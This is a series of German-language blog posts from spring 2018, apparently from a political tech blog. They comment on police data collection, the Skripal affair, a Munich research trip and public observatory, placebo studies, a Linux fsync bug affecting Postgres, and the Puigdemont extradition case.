[l] In einem Fußball-Fan-Sonderzug gab es eine Vergewaltigung. Aber sensibilisiert von der Silvesternacht in Köln hat die Polizei mit aller Härte durchgegriffen:
Alle 750 Zuginsassen wurden von der Bundespolizei einzeln jeweils an dem Bahnhof kontrolliert, an dem sie ausstiegen – und zwar in Mainz-Mombach, Koblenz, Bonn und Mönchengladbach. […] In Mönchengladbach wurde der Zug auch von der Bundespolizei durchsucht und die Spurensicherung in alle Toiletten geschickt. […] Da zusätzlich zur Aufnahme der Personalien auch Fotos der Fans gemacht wurden, zeigte sich die Polizei zuversichtlich, den Täter zu fassen.
Auf der einen Seite freue ich mich, wenn die Polizei sich aktiv um die Aufklärung von Verbrechen kümmert, aber gerade der letzte Teil mit den Fotos aller Fans lässt mich vermuten, dass es hier um die Befüllung der Gefährderdatenbank ging. Was meint ihr, werden die Fotos der Fans alle wieder zeitnah gelöscht?
Update: Das Lawblog berichtet auch über den Fall, aber aus einer anderen Warte. (Danke, Kris)

Wed Apr 18 2018

[l] Liebe Leser, ich brauche mal eure Hilfe.
Ist hier jemand künstlerisch begabt und hat ein bisschen Zeit? Ich habe beobachtet, dass Menschen großartig darin sind, alten Code als mistige, gammelige "Legacy" zu erkennen, die furchtbar ist und damals ein großer Fehler war. Aber sie sind ebenfalls großartig darin, neuen Code entgegen jeder Erfahrung und bar jeder Vernunft als hoffnungsvoll oder gar inspirierend zu sehen — nicht nur nicht als Fehler, sondern als Errungenschaft! Diesmal ist es anders, diesmal haben wir das nicht wieder alles so schlimm verakckt, diesmal haben wir alles richtig gemacht!
Ich habe mir dazu den Slogan "Creating Tomorrow's Legacy Today" überlegt, und brauche noch eine angemessene visuelle Darstellung davon.
Ich dachte als Vorlage an so Propaganda-Poster aus dem 2. Weltkrieg. Zur Inspiration: Sowjetische Kriegspropagandaposter und Amerikanische Kriegspropagandaposter, vielleicht We Can Do It! oder so?
Das Konzept ist ja nicht neu, siehe Calvin and Hobbes oder diese wunderschöne Illustration :-)
Oder hey, wenn jemand eine Idee hat, wie man das als Scifi statt Retro machen kann, oder irgendeinen anderen Kunststil, der der Botschaft Gewicht verleiht: Das ist natürlich auch herzlich willkommen!
Update: Alte Arbeitssicherheits-Poster sind auch eine gute Vorlage.

Fri Apr 13 2018

[l] Neulich gab es doch diese FBI-Hausdurchsuchung bei Trumps Bagman, äh, Anwalt, Cohen. Stellt sich raus: Der hat Tape-Mitschnitte von Gesprächen gemacht und saß auf einem fetten Kompromathaufen über Trump und seine Junta und da geht jetzt die Angst um, das FBI könnte diese Tapes gefunden und mitgenommen haben.

Sun Apr 8 2018

[l] OK nochmal zu dem Skripal, weil das viele Leser falsch deuten, was ich hier zu sagen versuche.
Ja, alles, was ich hier schreibe, ist eine Medienkompetenzübung. Ja, da ist viel russische Propaganda bei. Das folgt zwangsläufig aus meinem Modell, immer denen mehr Luft zu geben, deren Positionen bei spon und sz und co weniger Luft kriegen, und zwar unabhängig davon, ob das wahr ist oder nicht, was die sagen (das kann ich ja selber im Normalfall gar nicht beurteilen).
Zu Skripal kam ein schöner langer Leserbrief rein:
Diese Argumentation ist ja im Moment Teil der russischen Propaganda, obwohl die sehr genau wissen, dass die Aufgabe der Chemiker auch gar nicht war, einen Herkunftsnachweis zu erbringen:
"It is our job to provide the scientific evidence of what this particular nerve agent is, we identified that it is from this particular family and that it is a military grade, but it is not our job to say where it was manufactured."
— Aitkenhead (Chef des zuständigen Porton Down Labors)
Der (britische) Argumentationspfad besagt, dass die das aus Quellen haben, die die uns einfach nicht öffentlich sagen wollen. Mehr nicht. Kann ich auch nachvollziehen. Da haben irgendwo in den russischen Reihen einen sitzen, den die natürlich nicht offen legen wollen. Die Russen müssen das natürlich in ein anderes Licht stellen. Johnson und May behaupten schließlich auch, die Entscheidung kommt von Putin persönlich. Mal ganz davon ab, hat das britische Außenministerium auch noch mal klar gemacht im UN-Sicherheitsrat, dass die mit "highly likely" nicht etwa die Möglichkeit eines Zweifels offen lassen möchten, sondern dass sie das als Teil eines Ermittlungsprozesses sehen, an dessen Ende nur ein Richter ein Urteil spricht und deswegen aus deren Sicht keine Interpretationen dort hineinfließen sollen. Liest man so was aus einem Bericht eines Chemielabors?
Den ganzen Zusammenhang zwischen Herkunftsnachweis und diesem Labor, den habe ich auch ehrlich gesagt, zum ersten mal bei Sputnik-News gelesen… NICHT etwa von Boris Johnson (der das, soweit ich gerade googlen kann, in diesen Zusammenhang überhaupt auch nicht ein einziges Mal hergestellt hat).
Meiner Meinung nach verraten die russischen Akteure ihre eigene Position in der Geschichte allein schon dadurch, dass sie eben zu derartigen Mitteln greifen und beispielsweise Aussagen wie die aus dem Labor *wissentlich* so verdrehen oder in einen Kontext stellen, als hätten die Chemiker eben die Herkunft nicht ermitteln *können* (und implizieren, dass sie *sollten*) … und benutzen das dann als Indiz für ihre Unschuld. Der ganze Druck der russischen Marketingabteilung *hust* zielt ja eigentlich auch gar nicht auf die Aufklärung, sondern vor allem auf die Offenlegung von britischem Geheimdienstwissen und Veränderung von Wahrnehmung britischer Aussagen. Sie tragen ja selbst nicht zur Aufklärung bei (obwohl ihnen Gelegenheit dazu gegeben wurde bzw. wurden sie per Ultimatum dazu aufgefordert -> was die als "Quatsch" abgelehnt haben). Die Russen wiederum dringen nur dazu, in die Akten schauen zu dürfen und behaupten sogar, sie würden gar nicht einbezogen (srsly?). Und dadurch, dass sie wissen, dass die Briten nie zulassen werden, die Infrastruktur-Details der eigenen Dienste preiszugeben, können sie halt lauthals die Offenlegung fordern - auch wenn sie wissen, dass das ihre Schuld beweisen kann.
Ja, es gibt keine *öffentlichen Beweise. Da haben wir jetzt alle begriffen. Das heißt aber nicht, dass sie keine haben und auch nicht, dass das öffentlich wird. Und srsly… wenn die Lügen wollten, würden sie es nicht in irgendwelchen verschlüsselten Nachrichten in der Presse durchblicken lassen (Keyword: "überspezifisches Dementi").
Aus Russland wird nicht zur Aufklärung beigetragen und öffentliche Aussagen der Briten werden durch die höchsten russischen Beamten derart falsch wiedergegeben, dass sich ihr Sinn verändert. Das wiederum ist für mich durchaus ein Indiz, das ich für mich persönlich erkenne und aus dem ich schlussfolgern kann.
Und wo ich mich schon mal dazu hab hinreißen lassen, Dir mal zu schreiben -> ich sehe das bei Deinen Bellingcat-Rants ganz ähnlich. Ich habe deren Paper zum Absturz damals gelesen und auch gesehen, wie die russischen Ministerien damit umgegangen sind. Da haben die über Tools schwadroniert und lauter so Gedöns und ob man derartige Recherche überhaupt betreiben kann. Angeblich konnte die Software sowas ja auch gar nicht nachweisen, die die damals benutzt haben. Aber das war genau so eine Geschichte wie jetzt mit Skripal - ja, die Software hatte so ein Feature nicht, aber trotzdem konnte man es zur Analyse verwenden und Schlussfolgerungen aus der JPEG-Fehlerdichte ziehen, die auf den Bildern so nicht zu erwarten war. Das hat man dann - oops - vergessen zu erwähnen, auch das die ja eine ganze Reihe anderer Indizien zu einer Kette verflochten haben. Auch, dass das zuständige Ministerium die betreffenden Originalbilder der Analyse hat aus der eigenen Webpräsenz verschwinden lassen - Hoppla? - wollte man lieber nicht weiter kommentieren. Es reichte, dass man der Welt verkündet, die Software, die Bellingcat nutzte, war ja für diesen Zweck gar nicht geeignet.
Sowas reicht mir schon. Wenn du ernsthaft aufklären willst, dann nicht indem du die Argumentation derer, die auch aufklären wollen, in dieser Weise verwässerst, dass sie sich in der öffentlichen Wahrnehmung verändern.
Aus welchen Gründen sollte man sich eigentlich solcher Strategien bedienen, wenn man nicht in der Täterrolle so einer Geschichte steckt?
Wer fragt eigentlich nach der Beweislast, wenn mal der Lawrow seine Behauptungen vom Stapel lässt? Richtig, niemand. Wir haben uns irgendwie dran gewöhnt, dass der **** erzählt. Der hat ja ganz öffentlich in einer Pressekonferenz behauptet, das wären britische Dienste. Und warum? Wegen dem mies laufendem Brexit natürlich. Ja ne, schon klar. 20 Staaten weisen russische Diplomaten aus? Alles von den USA eingefädelt! Eine "kollossale Erpressung" (nicht dass nachher noch einer meint, die handeln wirklich eigenständig, weil was dran ist). Fragt da eigentlich noch einer nach Plausibilitäten? Wars denn jetzt der Trump? Oder das russische Außeniministerium war so frei mal eben Tschechien, Schweden und die USA "hochwahrscheinlich" als Herkunftsländer des Gifts, quasi als potentielle Täter zu präsentieren. Wieso zuerst Russland, man könne ja erstmal gegen die anderen ermitteln … das wäre ja sonst anti-russisch (so muss man also Prioritäten in der Beweisführung setzen?). Und wie immer - auch in der Ukraine oder Syrien - kommt da rein gar nichts an Beweisen außer dem "cui bono", das gleich mal jeden mit etwas Fantasie und Bedarf an Verschwörungsdrama dazu triggert, dem auch nachzulaufen.
Und sogar die Tatsache, dass sich aus Russland mit jeder Meldung irgendwelche neuen Szenarien speisen, dass ist doch auch so ein Indiz. Vielleicht liegt die von allen britischen Parteien konsequent kompatible Linie ja gar nicht an einem perfekten Briefing aller Teilnehmer, sondern daran, dass es keins gab…
Einer der Gründe, wieso ich es gut und richtig finde, der russischen Position hier Platz zu lassen, ist damit man Gelegenheit hat, Muster zu erkennen. Die sind hier in dem Leserbrief sehr schön beschrieben. Dazu kommt natürlich, dass ich vorher auch nicht weiß, ob das Propaganda ist oder ob diesmal was dahinter steckt. Aber mir geht es ja hier mit dem Blog auch nicht um das Veröffentlichen der Wahrheit sondern um Medienkompetenz und um das Liefern von Bausteinen, anhand derer jeder seine eigene Meinungsbildung betreiben kann.
Update: Oh und abgesehen davon ist es natürlich absolut nicht satisfaktionsfähig, aufgrund von Geheimdienst-Beweisen, die man niemandem zeigen will, irgendwelche Anklagen zu erheben. Vielen Dank an der Stelle an Colin Powell, der das ein für alle Mal beerdigt hat.
Update: Jetzt schicken mir hier lauter Leser Links für Boris Johnsons Aussage. Das ist nicht der Punkt. Der Punkt war: Genau so klar, wie ihr seht, dass die Briten lügen, sieht dieser Einsender, dass die Russen lügen. Und es ist wichtig, beide Perspektiven zu sehen und am besten auch selbst einnehmen zu können, und sei es nur, um Widersprüche zu finden. Nennt es Medienkompetenz!

Sat Apr 7 2018

[l] Die München-Reise ist vorbei, wir sitzen im Zug heim nach Berlin. München hat uns sehr gut behandelt, und wir sind dankbar für die schönen Gelegenheiten. Ich möchte jetzt mal nicht die Forschergruppen nennen, bei denen wir waren, weil die ja alle eigentlich Dinge zu tun haben und es ja auch nicht wichtig ist, wen man da konkret besucht, wenn ihr jetzt Blut geleckt habt und das auch mal probieren wollt. Wichtig ist, dass man sich mal aufrafft und das macht.
Aber eine Sache kann ich doch namentlich erwähnen, denn die machen das ehrenamtlich und sind auf Spenden angewiesen und freuen sich über jeden Besucher: Die Volkssternwarte am Ostbahnhof. Ich bin fast der Meinung, dass man das eher als Hackerspace sehen sollte, oder vielleicht als Makerspace, denn die haben da nach dem Krieg auf einer alten Flak-Bunker-Plattform der Nazis Teleskope montiert (wackelt nicht und hält auch schwere Aufbauten aus). Die Halbkugel und die Apparaturen, um das drehbar zu gestalten, haben sie sich selbst aus Holz geschreinert, die Teleskope sind teilweise gespendet, teilweise selbst gekauft oder gebaut. Und da sitzen dann nach Sonnenuntergang Nerds und beobachten den Himmel. Als ich da war, haben wir mit Computer-Tracking einen ISS-Überflug beobachtet mit einem 80cm-Teleskop, das ist sozusagen deren Rechts-Unten-Modell. Wenn man das direkt nach Sonnenuntergang macht, dann wird die ISS selbst noch von der Sonne beschienen, und man kann sie mit bloßem Auge als Punkt innerhalb von 5 Minuten oder so über den Himmel rauschen sehen. Mit dem Teleskop konnte man die Solarmodule zählen. Ein cooles Erlebnis und ich kann das echt nur empfehlen, besonders mit interessierten Teenagern (das ist spät am Abend, mit kleinen Kindern ist das möglicherweise zu spät und wird auch je nach Jahreszeit recht kühl). Die haben da auch ein Mini-Planetarium, alles inklusive der Bestuhung aus Spenden zusammengebastelt. Ein tolles Erlebnis, auch wenn man nicht auf Astronomie steht, einfach um mal die Begeisterung mitzunehmen, mit der die Nerds da ihre Sachen bereitwillig zeigen und erklären und Gäste mal mitgucken lassen.
Ansonsten haben wir noch einen kurzen Abstecher in den Englischen Garten gemacht und uns die stehende Welle angeguckt und die Surfer, den chinesischen Turm (mit Blaskapelle in Lederhosen und mit Gamshaar am Hut), Touristen-Programm halt. Nicht einmal trafen wir auf jemanden mit schlechter Laune. München macht da etwas richtig, das Berlin sich mal abgucken könnte. Ich glaube, der Hauptunterschied ist, wenn in München etwas kaputt geht, dann wird das repariert :-)
Auf jeden Fall: Danke, München, für die Gastfreundschaft und die tollen Dinge, die ihr uns gezeigt habt. Wir kommen hoffentlich bald wieder. Und wenn ich hier ein paar Leser inspirieren konnte, auch mal eine Forschungstour zu machen, dann ist das ja auch was wert.
Update: Oh und wenn man in München und in Berlin eine Milliarde Euro auf den Tisch legt, dann baut München damit coole Infrastruktur und pflegt die auch, und in Berlin werden erstmal Löcher gestopft (Lehrergehälter zahlen oder so) und einen Plan für Wartung und Pflege gibt es auch nicht. Es ist erstaunlich, wieviel sich das Lebensgefühl steigert, wenn die Infrastruktur verlässlich ist. Die Münchner meckern immer noch gerne über ihren öffenltlichen Nahverkehr, das kann ich gar nicht nachvollziehen. Wenn man bedenkt, für wie viel weniger Fahrgäste das U-Bahn-System ausgelegt war, ist es eine bemerkenswerte Leistung, dass das alles so flutscht. Früher war das Preisniveau mal ein valider Kritikpunkt, aber da haben andere Städte deutlich nachgezogen.
Update: Volkssternwarten nach diesem Muster gibt es auch in anderen Städten, mir schreibt gerade noch jemand aus Nürnberg von der Volkssternwarte.
Update: Leserbrief:
du tust uns Volkssternwarten, insbesondere heute bei dem traumhaften Wetter, noch einen riesigen Gefallen wenn du auf die öffentlichen Führungen hinweist die heute in München und Nürnberg um 21:00 Uhr stattfinden :)
Gerne doch!
Update: Äh, 80cm nicht 80" :-)

Fri Apr 6 2018

[l] Ich bitte, die Blog-Dürre im Moment zu entschuldigen; ich bin wie angekündigt nach Garching gefahren und gucke mir Experimente an. Die Anzahl der Rückmeldungen war so groß, dass ich das Deutsche Museum schon wieder verschieben musste, und für den Aufenthalt mehr Angebote als Zeit habe. Das hätte ich mir nicht träumen lassen, und an dieser Stelle ein herzliches Dankschön an alle, die mir hier etwas zeigen oder mir das angeboten haben.
Es stellt sich übrigens raus, dass das Deutsche Luft- und Raumfahrtzentrum gerade 50jähriges Jubiläum feiert und man daher ausnahmsweise als Besucher das Space Operations Center betreten kann. Das ist allerdings am anderen Ende vom Großraum München, in Oberpfaffenhofen und nicht in Garching. Wer also in der Gegend ist, sollte da mal drüber nachdenken. Die Feierlichkeiten gehen noch 1-2 Wochen glaube ich. Mal gucken, ob ich es da morgen vor der Rückfahrt noch hinschaffe.
Eine der bisherigen Erkenntnisse von der Reise ist jedenfalls, dass Quantenmechanik und insbesondere Quantencomputer-Grundlagenforschung im Moment eine herausragende Bedeutung für die Physik-Forschung hat. Die EU-Kommission, erzählte man mir, hat eine Milliarde Euro für das Gebiet locker gemacht. Aber die Forschung ist noch nicht so weit, dass man sich ernsthaft Sorgen machen müsste, dass in naher Zukunft jemand mit einem Quantencomputer eure RSA-Schlüssel faktorisieren könnte. Konsens bisher scheint ein Zeitrahmen von 10-20 (eher 20) Jahren zu sein. Es bleibt also spannend!

Mon Apr 2 2018

[l] Wenn ihr auf die bayerische Extremistenliste schaut, werdet ihr feststellen, dass da die FDJ steht.
Das ist praktisch ein Berufsverbot für DDR-Bürger in Bayern.
Wenn man CSU-Wähler mal fragt, was an der DDR eigentlich so schlimm war, kommen im Allgemeinen die Mauertoten (d.h. so harte Grenzmaßnahmen, dass dort Menschen sterben) und Bautzen (politische Gefangene werden ohne Verfahren weggesperrt).
Im Mittelmeer sind Größenordnungen mehr Menschen Opfer von harten Grenzmaßnahmen geworden als an der Mauer. Hauptvorantreiber von harten Grenzmaßnahmen in Deutschland ist die CSU. Und Bayerns innovatives Polizeigesetz sieht für mich inhaltlich nicht anders als Bautzen aus.
Ich stelle mir gerade vor, wenn uns das nächste Mal die Amerikaner von den Faschisten befreien, dass es dann wieder einen Radikalenerlass gibt und einfach mal pauschal alle Mitglieder der Jungen Union oder der CSU Berufsverbot erhalten. Verdient hätten sie es. Und dann ein paar Denkmäler und Erinnerungsschilder für Seehofer, damit so ein offensichtliches Unrecht nie wieder von Deutschland ausgeht, natürlich Aufnahme ins Curriculum. Im Schulunterricht könnte man dann z.B. diskutieren, wieso die Menschen das eigentlich mitgemacht haben, und das Entstehen des Unrechtsstaates nicht verhindert haben, als sie es noch gekonnt hätten.
Was meint ihr?
Update: Oh es handelt sich anscheinend nicht um die FDJ aus der DDR sondern um die "FDJ in Westdeutschland".
Update: Ein Leser weist darauf hin, dass Bautzen-II für verurteilte politische Gefangene war. Im Gegensatz zum bayerischen Polizei"recht" also noch mit Rudimenten von Gewaltenteilung und Rechtstaatlichkeit.

Sun Apr 1 2018

[l] Die Placebo-Diskussion sorgt weiter für Einsendungen. Hier noch einer:
als Pharmaziestudent kann ich dir sagen, dass durchaus ethische Gründe beim Studiendesign eine Rolle spielen. So wird es bei Krankheiten wie Hypertonie (Bluthochdruck) oder chronische Herzinsuffizienz niemals mehr eine Studie geben, bei der eine Person zu erforschendes Medikament X bekommt und die Vergleichsperson Placebo. Dies gilt als unethisch! Man hat es vor über 40 Jahren aber noch so gemacht. Das ganze geht sogar weiter. Wenn du während der Studie merkst, dass dein Medikament die Erwartungen deutlich übersteigt bzw. extrem viel besser abschneidet als die Therapie vorher, dann bekommen ab bestimmten Surrogatparametern auch diejenigen das neue Medikament, die in der "alte Therapie + Placebo"-Gruppe gelandet sind, so geschehen beim Medikament Imatinib ("Glivec"). Man verfolgt dann den weiteren Verlauf der Probanden, die nun alle dieselbe Therapie bekommen.
Von der Bundesärztekammer gibt es 2010 eine Stellungnahme zu dem Thema

Fri Mar 30 2018

[l] US-Einreise wird bald noch unangenehmer.
require most visitors and immigrants to the U.S. to divulge their recent social media histories […] Travelers would also be asked to list phone numbers, email addresses and international travel during the previous five years, and to detail any immigration problems they have had, whether with the U.S. or elsewhere. They also will be asked about potential family connections to terrorism.
Außerdem wollen sie jetzt Einreisende daran erinnern, dass Genitalverstümmelung in den USA nicht gemacht wird. Also bei Mädchen jetzt. Bei Jungs natürlich schon. Das ist ja was ganz anderes, müsst ihr wissen. Bei Mädchen ist das eine barbarische Praxis von stinkenden rückständigen Terroristen. Bei Jungs ist das eine wohlgepflegte, wichtige religiöse Tradition und ein Kulturgut.
[l] Benutzt hier jemand Postgres unter Linux?
Stellt sich raus, dass die im Kernel das fsync-Verhalten verkackt haben, und Postgres daher Daten verlieren kann, wenn fsync fehlschlägt. Wenn man fsync aufruft, und das failed, und dann ruft man es später nochmal auf, dann erwartet der Kernel anscheinend von einem, dass man die writes dazwischen auch nochmal gemacht hat. Das ist völlig unerwartet und Postgres tut es nicht.

Thu Mar 29 2018

[l] Wenn man ein Medikament auf seine Wirksamkeit überprüfen will, führt man einen Doppelblindtest durch. Man sucht sich Probanden, und die eine Hälfte davon kriegt das Medikament, und die andere Hälfte kriegt ein Placebo. Wichtig ist dabei, dass weder die Patienten noch die Ärzte wissen, ob dieser Patient hier gerade das Placebo oder das Präparat kriegt.
In den letzten Jahren, und den Gedanken finde ich echt mindblowing, wurden Placebos immer stärker und Medikamente immer schwächer. So und jetzt die Punchline: Nur in den USA werden Placebos stärker! ACH NEE! What the FUCK?!
Woran das liegt, weiß man nicht. Spekulationen gehen von "naja die sehen ständig Medikamentenwerbung und glauben da daher stärker an die Wirksamkeit" bis "die Studien werden heutzutage von Spezialfirmen statt Studenten gemacht, und die betreuen intensiver, was den Placebo-Effekt verstärkt".
Faszinierend!
Jetzt müsste man mal eine Studie in den USA mit zur Hälfte Reisenden aus anderen Ländern und zur anderen Hälfte US-Bürgern machen. Oder so. (Danke, Patric)
[l] Boah Mann ey, das macht mich ja hier mal wieder ganz fertig alles.
Stellt sich raus, dass dieser Hinweis auch gerade als finster-übel-bösartiges RT-Mem herumgerusst wird, und ich kriege jetzt böse Mails, ich würde mich zum Erfüllungsgeholfen der Propaganda-Bots machen.
Also erstmal: Ich habe da nichts verglichen und keine Wertung mit verbunden. Das sollen ja bei mir im Blog die Leser machen. Sonst wäre das keine Meinungsbildung, sondern Meinungs-Guttenbergen, die niemandem hilft.
Zweitens ist es egal (ja, ich hab es gesagt! Es ist EGAL!), wer etwas zuerst gesagt hat, oder wer sonst etwas sagt. Ihr sollt Dinge nach ihrem Inhalt beurteilen, nicht nach dem Boten. Wie könnt ihr selbsternannten Progressiven das Bewerten von Personen nach Aussehen oder Herkunft als böse erkennen, aber das Bewerten von Personen nach Aussehen oder Herkunft der von ihnen getätigten Äußerungen nicht? Wenn ihr eine legitime Kritik an der Aussage habt, hat da ja niemand ein Problem mit. Aber mir die Aussage anzukreiden, weil die irgendein aus eurer Sicht böser Mensch auch getätigt hat, das ist so dermaßen unter aller Sau, da sollten euch beim Tippen der Mail die Finger schmerzen!
Ich habe mir übrigens wohlgemerkt keinerlei Konnotation zueigen gemacht. Ich habe auf historische Fakten verwiesen. Weder habe ich Spanien unterstellt, ein Unrechtsregime wie unter Franco zu sein. Noch habe ich Spanien unterstellt, die Todesstrafe zu haben. Noch sonst irgendwas.
Aber wenn wir schon bei verwerflichen inhaltlichen Aussagen sind: Kennt sich hier jemand genug mit dem spanischen Recht aus, um mir sagen zu können, ob der Hochverrats-Paragraph in deren Gesetzbuch noch aus der Franco-Zeit kommt?
Bei uns gibt es keinen Straftatbestand "Rebellion" und wenn ein Politiker friedlich Sezessionsbestrebungen äußert, … nun, die Bayernpartei sitzt meines Wissens noch nicht hinter Gittern, oder?
Ich habe gelesen, dass auch in Spanien für Rebellion Gewalt nötig ist. Das trifft hier nicht zu, soweit ich weiß. Wieso konnte also dieser Haftbefehl überhaupt ausgestellt werden? Und wieso wird der in Deutschland dann honoriert? Den Straftatbestand des Ungehorsams gibt es hier auch nicht, damit sollte man also auch keinen Haftbefehl in Deutschland vollstreckt kriegen.
Gut, zumindest den Teil kann ich aufklären:
Der Rahmenbeschluss nennt 32 Straftaten bzw. Deliktsbereiche, bei denen die Auslieferung sogar dann erfolgen muss, wenn die Tat nach dem Recht des ausliefernden Staates gar nicht strafbar ist (Art. 2 Abs. 2; es wird insofern auf das Erfordernis beiderseitiger Strafbarkeit verzichtet). Zu diesen Straftaten zählen u. a. die Beteiligung an einer kriminellen Vereinigung, Terrorismus, Menschenhandel, sexuelle Ausbeutung von Kindern und Kinderpornografie, Drogenhandel, illegaler Handel mit Waffen, Munition und Sprengstoffen, Korruption, Betrug, Geldwäsche, Fälschung von Geld und anderen Zahlungsmitteln, Cyberkriminalität, Umweltkriminalität, Beihilfe zur illegalen Einreise und zum illegalen Aufenthalt, vorsätzliche Tötung, schwere Körperverletzung, Organhandel, Entführung, Freiheitsberaubung und Geiselnahme, Rassismus und Fremdenfeindlichkeit, Erpressung und Schutzgelderpressung, Nachahmung und Produktpiraterie, Fälschung von amtlichen Dokumenten und Handel damit, Handel mit gestohlenen Kraftfahrzeugen, Vergewaltigung, Brandstiftung, Flugzeug- und Schiffsentführung und Sabotage.
Hmm. Das bringt mich auf eine Idee. Könnte man über den europäischen Haftbefehl deutsche Abgeordnete wegen Korruption drankriegen, auch wenn das hier nicht strafbar ist, weil die sich nicht zu einem entsprechenden Gesetz durchringen können? Das käme doch mal auf einen Versuch an!
Was ich mit dem ursprünglichen Post machen wollte, ist erstmal Kontext schaffen. Aus meiner Sicht ist es immer gut, mehr Kontext zu haben, wenn man eine Entscheidung trifft. Mir ging es in diesem Fall um die Entscheidung, ob man den Puigdemont ausliefern soll oder nicht. Und für mich persönlich folgt aus dem Beispiel mindestens, dass "legal" nicht reicht. Das ist notwendig aber nicht hinreichend. Es kann auch legale Auslieferungen geben, die trotzdem illegitim sind.
Im Übrigen möchte ich mal auf ein Detail hinweisen, unabhängig von Katalonien. Wenn wir als Gesellschaft sagen, dass alle Dinge, über die RT redet, automatisch vergiftet sind, dann geben wir den Russen die Macht, uns vorzuschreiben, worüber wir reden dürfen und worüber nicht. Ich finde es absolut nicht einleuchtend, wieso wir das tun sollten. Wir sind hier der Souverän, der angeblich aufgeklärte Bürger. Wir sollten über alles reden können, worüber wir reden möchten. Nicht nur das, worüber nicht auch RT gerade schreibt. Denkt mal drüber nach.
Update: Telepolis hat was dazu: Erstens findet das Amtsgericht, dass der europäische Haftbefehl durchaus nach Prüfung unzulässig sein könnte. Zweitens begründen sie die Rebellion so:
[Puigdemont] beschloss, sich die Macht der Masse zunutze zu machen, um sich mit ihr dem Polizeihandeln entgegenzustellen, das, wie [die Separatisten] wussten, das Referendum verhindern sollte, so dass die Abstimmung durchgeführt werden könnte und so der Weg gebahnt würde nicht nur dazu, dass das Ergebnis des Referendums die Ausrufung der Unabhängigkeit erlauben würde [...], sondern auch, dass der Staat der gewaltsamen Entschlossenheit eines Teils der Bevölkerung, die sich auszubreiten drohte, nachgeben würde.
Das sagt der Richter, der den Haftbefehl ausgestellt hat. Der argumentiert also: OK, ER war nicht gewalttätig und hat auch nicht mit Gewalt gedroht, aber wir haben ja Polizei geschickt, um das Referendum zu verhindern, und DIE war gewaltbereit, und wer sich davon nicht einschüchtern lässt, das ist ja dann sozusagen fast ungefähr also so ein bisschen eventuell deutbar wie gegen-gewaltbereit und das ist ja praktisch selbst Gewaltausübung. Ich weiß nicht, wie es euch geht, aber mir krümmen sich da die Zehennägel. Wenn die mit solchen Argumentationen in Spanien Gerichtsurteile fällen, dann ist nach meinem Rechtsgefühl schon das ein Hinderungsgrund für Auslieferungsersuchen aus Spanien. WTF? Mit so einer "Argumentation" kann man jeden wegen allem verurteilen. What the fuck!?
Faszinierenderweise haben sich die Macher des europäischen Haftbefehls offensichtlich auch Sorgen um das Szenario gemacht, dass irgendein Rogue State das missbrauchen könnte, und haben eingebaut, dass wenn Spanien nur wegen Untreue ausliefern ließe, dass sie ihn dann auch nur wegen Untreue belangen dürften und nicht zusätzlich noch wegen Rebellion. Daher hat Spanien diese groteske Argumentation überhaupt veröffentlichen müssen.
Update: Laut dieses Artikels gibt es den Rebellion-Paragraphen seit den 1990er Jahren in Spanien. Es ist also kein Franco-Relikt.
Oh und die FAZ schreibt über Artikel 155 (der in Spanien gegen die Katalonien-Abspaltung angewendet wird):
Der Artikel 155 sagt darüber nichts, sondern es geht ganz allgemein darum, dass die Zentralregierung die Behörden in Katalonien zur Einhaltung ihrer Verpflichtungen unter der spanischen Verfassung anhalten kann. Was auch immer das im Einzelnen heißt. Der Artikel 155 ist vergleichbar mit Artikel 37 des Grundgesetzes, wo es um den sogenannten Bundeszwang geht. Wenn man die beiden Artikel nebeneinander legt, so kann man fast davon ausgehen, dass der Artikel 37 des Grundgesetzes Pate gestanden hat für Artikel 155 in der zeitlich ja später liegenden spanischen Verfassung. Auch bei uns im Grundgesetz sind keine Maßnahmen aufgeführt.
Oh. Ach?

Tue Mar 27 2018

[l] Kurzer TV-Tipp: Heute ab 22:10 auf arte: Follow Me: Arabische Videostars.
Tilo Jung reist durch einige arabische länder und redet mit Youtubern vor Ort, versucht herauszufinden, worüber die so reden und reden können und worüber nicht. Was die so für Themen haben.
Ich bin ja eher nicht viel auf Youtube unterwegs, und kann mit den meisten Sendungen dort auch nichts anfangen, weil ich mich häufig als Ware behandelt fühle.
Du googelst irgendein konkretes Problem, und anstatt dir in drei Zeilen Text zu sagen, was du tun sollst, drücken dir die Leute 20 Minuten Youtube-Video rein, davon 18 Minuten schlechte Musik und überflüssige Intros, langwieriges irrelevantes Rumschwandronieren, und ewig lange Aufforderungen zum Subscriben oder Liken oder was bei Patreon spenden. Und dann monetarisieren sie das Video natürlich, damit einem fett Werbung reingedrückt wird. Ja nee, sorry, da habe ich Null Verständnis für. Daher ist Youtube nicht so meines. Auch übliche Inhalte wie Fashion- und Schminkvideos betrachte ich mit einer ähnlich morbiden Faszination wie ich mir vorstelle, dass uns gerade Aliens beim Planeten-Kaputtmachen beobachten.
Insofern war ich erst irritiert, dass sie in dem Film auch so Fashion-Youtuberinnen aus Dubai haben, aber am Ende des Films muss ich sagen, dass das die Teile des Films waren, die mich am meisten weitergebracht haben.
Die anderen Interviewpartner waren muslimische "moderne Prediger" aus Ägypten, ein sekulärer "Verrückter" aus Ägypten (und sehr lustig, wie ich finde: beide fühlen sich ungerecht unterdrückt und verfolgt!), die Bubblegum-Reise- und Fashionblogger aus Dubai, und ein paar Syrien-Vlogger, die da in den Trümmern (sehr krasses Segment!) Comedy zu drehen versuchen.
Lohnt sich alles, aber die Syrer werden von ihrer Umwelt eingeschränkt, die Ägypter auch. Nur die Modeblogger aus Dubai schränken sich selber ein. Das hat den Teil für mich am interessantesten gemacht.
Ich bin ehrlich gesagt ziemlich überrascht, dass mich das überhaupt so interessiert hat am Ende. Das hab ich vorher so nicht kommen sehen.
Insofern: Klare Guckempfehlung.
Der Film hilft einem, mit anderen Augen auf die Lage im eigenen Land zu gucken. Und was kann man sich mehr wünschen von einem Film?
[l] Thomas Fischers Kolumne "Fischer im Recht" ist bei der "Zeit" rausgeflogen.
Und warum? Na ratet mal! Womit kann die "Zeit" gar nicht umgehen? Mit Kritik! Man erinnere sich nur an die legendäre Anstalt-Sendung, die "Zeit"-Herausgeber Josef Joffe so ins Mark traf, dass er juristisch gegen sie vorging, und nicht nur verlor, sondern einen saftigen Streisand-Effekt auslöste.
Und jetzt gab es wieder einen solchen Fall. Thomas Fischer wollte nämlich — in seiner Kolumne, wo auch sonst — die Berichterstattung der "Zeit" kritisieren. Aus seiner Sicht war deren Berichterstattung über die Vorwürfe gegen Dieter Wedel kritikwürdig:
Diese kam in seinen Augen einem «Tribunal» gleich, das wichtige Fragen gar nicht oder suggestiv beantwortete.
